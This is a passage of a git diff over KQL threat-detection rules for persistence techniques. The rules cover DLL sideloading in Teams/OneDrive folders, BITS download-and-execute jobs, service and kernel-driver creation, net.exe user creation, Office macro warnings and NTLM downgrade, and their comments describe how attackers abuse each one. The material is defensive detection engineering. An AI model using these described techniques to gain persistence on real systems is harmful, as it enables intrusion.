"C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords" \ No newline at end of file diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql index 0182d337..1072f8df 100644 --- a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql +++ b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql @@ -1,11 +1,11 @@ -// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder -// Author: frack113 -// Date: 2022-08-12 -// Level: high -// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications -// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 - -DeviceFileEvents +// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder +// Author: frack113 +// Date: 2022-08-12 +// Level: high +// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications +// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 + +DeviceFileEvents | where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft" \ No newline at end of file diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql index b0ce1d9b..f5056c4c 100644 --- a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql +++ b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql @@ -1,14 +1,14 @@ -// Title: Mask System Power Settings Via Systemctl -// Author: Milad Cheraghi, Nasreddine Bencherchali -// Date: 2025-10-17 -// Level: high -// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. -// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. -// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.impact, attack.t1653 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Mask System Power Settings Via Systemctl +// Author: Milad Cheraghi, Nasreddine Bencherchali +// Date: 2025-10-17 +// Level: high +// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. +// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. +// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.impact, attack.t1653 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "suspend.target" or ProcessCommandLine contains "hibernate.target" or ProcessCommandLine contains "hybrid-sleep.target") and (ProcessCommandLine contains " mask" and FolderPath endswith "/systemctl") \ No newline at end of file diff --git a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql index 911580fd..8711bbf5 100644 --- a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql +++ b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql @@ -1,10 +1,10 @@ -// Title: Modification of IE Registry Settings -// Author: frack113 -// Date: 2022-01-22 -// Level: low -// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Modification of IE Registry Settings +// Author: frack113 +// Date: 2022-01-22 +// Level: low +// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or isnull(RegistryValueData) or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision")))) and (not(RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents")) \ No newline at end of file diff --git a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql index d94ff684..471f25b9 100644 --- a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql +++ b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql @@ -1,10 +1,10 @@ -// Title: Modify User Shell Folders Startup Value -// Author: frack113 -// Date: 2022-10-01 -// Level: high -// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001 - -DeviceRegistryEvents +// Title: Modify User Shell Folders Startup Value +// Author: frack113 +// Date: 2022-10-01 +// Level: high +// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001 + +DeviceRegistryEvents | where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup" \ No newline at end of file diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql index 6f1fd198..ca21e44d 100644 --- a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql +++ b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql @@ -1,13 +1,13 @@ -// Title: Monitoring For Persistence Via BITS -// Author: Sreeman -// Date: 2020-10-29 -// Level: medium -// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. -// When the job runs on the system the command specified in the BITS job will be executed. -// This can be abused by actors to create a backdoor within the system and for persistence. -// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1197 - -DeviceProcessEvents +// Title: Monitoring For Persistence Via BITS +// Author: Sreeman +// Date: 2020-10-29 +// Level: medium +// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. +// When the job runs on the system the command specified in the BITS job will be executed. +// This can be abused by actors to create a backdoor within the system and for persistence. +// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1197 + +DeviceProcessEvents | where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql index 021db9d8..d9a412f5 100644 --- a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql +++ b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql @@ -1,12 +1,12 @@ -// Title: MSExchange Transport Agent Installation -// Author: Tobias Michalski (Nextron Systems) -// Date: 2021-06-08 -// Level: medium -// Description: Detects the Installation of a Exchange Transport Agent -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.002 -// False Positives: -// - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. - -DeviceProcessEvents +// Title: MSExchange Transport Agent Installation +// Author: Tobias Michalski (Nextron Systems) +// Date: 2021-06-08 +// Level: medium +// Description: Detects the Installation of a Exchange Transport Agent +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.002 +// False Positives: +// - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. + +DeviceProcessEvents | where ProcessCommandLine contains "Install-TransportAgent" \ No newline at end of file diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql index 71d92e82..3d35bef5 100644 --- a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql +++ b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql @@ -1,12 +1,12 @@ -// Title: NET NGenAssemblyUsageLog Registry Key Tamper -// Author: frack113 -// Date: 2022-11-18 -// Level: high -// Description: Detects changes to the NGenAssemblyUsageLog registry key. -// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). -// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: NET NGenAssemblyUsageLog Registry Key Tamper +// Author: frack113 +// Date: 2022-11-18 +// Level: high +// Description: Detects changes to the NGenAssemblyUsageLog registry key. +// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). +// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog" \ No newline at end of file diff --git a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql index 3fd74516..ea1a67da 100644 --- a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql +++ b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql @@ -1,12 +1,12 @@ -// Title: NetNTLM Downgrade Attack - Registry -// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT) -// Date: 2018-03-20 -// Level: high -// Description: Detects NetNTLM downgrade attack -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112 -// False Positives: -// - Services or tools that set the values to more restrictive values - -DeviceRegistryEvents +// Title: NetNTLM Downgrade Attack - Registry +// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT) +// Date: 2018-03-20 +// Level: high +// Description: Detects NetNTLM downgrade attack +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112 +// False Positives: +// - Services or tools that set the values to more restrictive values + +DeviceRegistryEvents | where (RegistryKey endswith "SYSTEM*" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\lmcompatibilitylevel") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000010)", "DWORD (0x00000020)", "DWORD (0x00000030)")) and RegistryKey endswith "\\NtlmMinClientSec") or RegistryKey endswith "\\RestrictSendingNTLMTraffic") \ No newline at end of file diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql index 470e3da8..a5a41fc3 100644 --- a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql +++ b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql @@ -1,12 +1,12 @@ -// Title: New BgInfo.EXE Custom DB Path Registry Configuration -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-16 -// Level: medium -// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate use of external DB to save the results - -DeviceRegistryEvents +// Title: New BgInfo.EXE Custom DB Path Registry Configuration +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: medium +// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of external DB to save the results + +DeviceRegistryEvents | where RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql index 1b5c6e76..13bb63f2 100644 --- a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql +++ b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql @@ -1,12 +1,12 @@ -// Title: New BgInfo.EXE Custom VBScript Registry Configuration -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-16 -// Level: medium -// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate VBScript - -DeviceRegistryEvents +// Title: New BgInfo.EXE Custom VBScript Registry Configuration +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: medium +// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate VBScript + +DeviceRegistryEvents | where RegistryValueData startswith "4" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql index 0de9fa9b..95e12749 100644 --- a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql +++ b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql @@ -1,12 +1,12 @@ -// Title: New BgInfo.EXE Custom WMI Query Registry Configuration -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-16 -// Level: medium -// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate WMI query - -DeviceRegistryEvents +// Title: New BgInfo.EXE Custom WMI Query Registry Configuration +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: medium +// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate WMI query + +DeviceRegistryEvents | where RegistryValueData startswith "6" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql index 8ecf6644..8d69c498 100644 --- a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql +++ b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql @@ -1,12 +1,12 @@ -// Title: New Kernel Driver Via SC.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-14 -// Level: medium -// Description: Detects creation of a new service (kernel driver) with the type "kernel" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 -// False Positives: -// - Rare legitimate installation of kernel drivers via sc.exe - -DeviceProcessEvents +// Title: New Kernel Driver Via SC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-14 +// Level: medium +// Description: Detects creation of a new service (kernel driver) with the type "kernel" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Rare legitimate installation of kernel drivers via sc.exe + +DeviceProcessEvents | where ((ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe") and (not(((ProcessCommandLine contains "create netprotection_network_filter" and ProcessCommandLine contains "type= kernel start= " and ProcessCommandLine contains "binPath= System32\\drivers\\netprotection_network_filter" and ProcessCommandLine contains "DisplayName= netprotection_network_filter" and ProcessCommandLine contains "group= PNP_TDI tag= yes") or (ProcessCommandLine contains "create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys" and ProcessCommandLine contains "type=kernel start=boot error=critical group=Early-Launch")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_odbc_driver_registered.kql b/KQL/rules/Persistence/new_odbc_driver_registered.kql index e2ff7413..d0f4d9c8 100644 --- a/KQL/rules/Persistence/new_odbc_driver_registered.kql +++ b/KQL/rules/Persistence/new_odbc_driver_registered.kql @@ -1,12 +1,12 @@ -// Title: New ODBC Driver Registered -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-23 -// Level: low -// Description: Detects the registration of a new ODBC driver. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Likely - -DeviceRegistryEvents +// Title: New ODBC Driver Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-23 +// Level: low +// Description: Detects the registration of a new ODBC driver. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Likely + +DeviceRegistryEvents | where (RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey endswith "\\SQL Server*"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_service_creation_using_powershell.kql b/KQL/rules/Persistence/new_service_creation_using_powershell.kql index 9ff9349e..29a821f6 100644 --- a/KQL/rules/Persistence/new_service_creation_using_powershell.kql +++ b/KQL/rules/Persistence/new_service_creation_using_powershell.kql @@ -1,13 +1,13 @@ -// Title: New Service Creation Using PowerShell -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023-02-20 -// Level: low -// Description: Detects the creation of a new service using powershell. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 -// False Positives: -// - Legitimate administrator or user creates a service for legitimate reasons. -// - Software installation - -DeviceProcessEvents +// Title: New Service Creation Using PowerShell +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2023-02-20 +// Level: low +// Description: Detects the creation of a new service using powershell. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Legitimate administrator or user creates a service for legitimate reasons. +// - Software installation + +DeviceProcessEvents | where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql index b052820a..d92b8c78 100644 --- a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql +++ b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql @@ -1,13 +1,13 @@ -// Title: New Service Creation Using Sc.EXE -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023-02-20 -// Level: low -// Description: Detects the creation of a new service using the "sc.exe" utility. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 -// False Positives: -// - Legitimate administrator or user creates a service for legitimate reasons. -// - Software installation - -DeviceProcessEvents +// Title: New Service Creation Using Sc.EXE +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2023-02-20 +// Level: low +// Description: Detects the creation of a new service using the "sc.exe" utility. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Legitimate administrator or user creates a service for legitimate reasons. +// - Software installation + +DeviceProcessEvents | where ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe") and (not((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql index 2ef19710..660cb5a5 100644 --- a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql +++ b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql @@ -1,12 +1,12 @@ -// Title: New TimeProviders Registered With Uncommon DLL Name -// Author: frack113 -// Date: 2022-06-19 -// Level: high -// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. -// Adversaries may abuse time providers to execute DLLs when the system boots. -// The Windows Time service (W32Time) enables time synchronization across and within domains. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003 - -DeviceRegistryEvents +// Title: New TimeProviders Registered With Uncommon DLL Name +// Author: frack113 +// Date: 2022-06-19 +// Level: high +// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. +// Adversaries may abuse time providers to execute DLLs when the system boots. +// The Windows Time service (W32Time) enables time synchronization across and within domains. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003 + +DeviceRegistryEvents | where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe.kql b/KQL/rules/Persistence/new_user_created_via_net_exe.kql index 1f789bc2..12efcded 100644 --- a/KQL/rules/Persistence/new_user_created_via_net_exe.kql +++ b/KQL/rules/Persistence/new_user_created_via_net_exe.kql @@ -1,13 +1,13 @@ -// Title: New User Created Via Net.EXE -// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community) -// Date: 2018-10-30 -// Level: medium -// Description: Identifies the creation of local users via the net.exe command. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1136.001 -// False Positives: -// - Legitimate user creation. -// - Better use event IDs for user creation rather than command line rules. - -DeviceProcessEvents +// Title: New User Created Via Net.EXE +// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community) +// Date: 2018-10-30 +// Level: medium +// Description: Identifies the creation of local users via the net.exe command. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 +// False Positives: +// - Legitimate user creation. +// - Better use event IDs for user creation rather than command line rules. + +DeviceProcessEvents | where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql index 65940bab..ca433ac1 100644 --- a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql +++ b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql @@ -1,12 +1,12 @@ -// Title: New User Created Via Net.EXE With Never Expire Option -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-12 -// Level: high -// Description: Detects creation of local users via the net.exe command with the option "never expire" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1136.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: New User Created Via Net.EXE With Never Expire Option +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-12 +// Level: high +// Description: Detects creation of local users via the net.exe command with the option "never expire" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql index c75228b3..9c99873a 100644 --- a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql +++ b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql @@ -1,10 +1,10 @@ -// Title: Non-privileged Usage of Reg or Powershell -// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community -// Date: 2020-10-05 -// Level: high -// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceProcessEvents +// Title: Non-privileged Usage of Reg or Powershell +// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community +// Date: 2020-10-05 +// Level: high +// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents | where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/office_application_startup_office_test.kql b/KQL/rules/Persistence/office_application_startup_office_test.kql index 0afb47c7..bc1e9378 100644 --- a/KQL/rules/Persistence/office_application_startup_office_test.kql +++ b/KQL/rules/Persistence/office_application_startup_office_test.kql @@ -1,12 +1,12 @@ -// Title: Office Application Startup - Office Test -// Author: omkar72 -// Date: 2020-10-25 -// Level: medium -// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137.002 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Office Application Startup - Office Test +// Author: omkar72 +// Date: 2020-10-25 +// Level: medium +// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf" \ No newline at end of file diff --git a/KQL/rules/Persistence/office_macros_warning_disabled.kql b/KQL/rules/Persistence/office_macros_warning_disabled.kql index 73dc8242..a1d37a25 100644 --- a/KQL/rules/Persistence/office_macros_warning_disabled.kql +++ b/KQL/rules/Persistence/office_macros_warning_disabled.kql @@ -1,12 +1,12 @@ -// Title: Office Macros Warning Disabled -// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-05-22 -// Level: high -// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Office Macros Warning Disabled +// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-22 +// Level: high +// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" 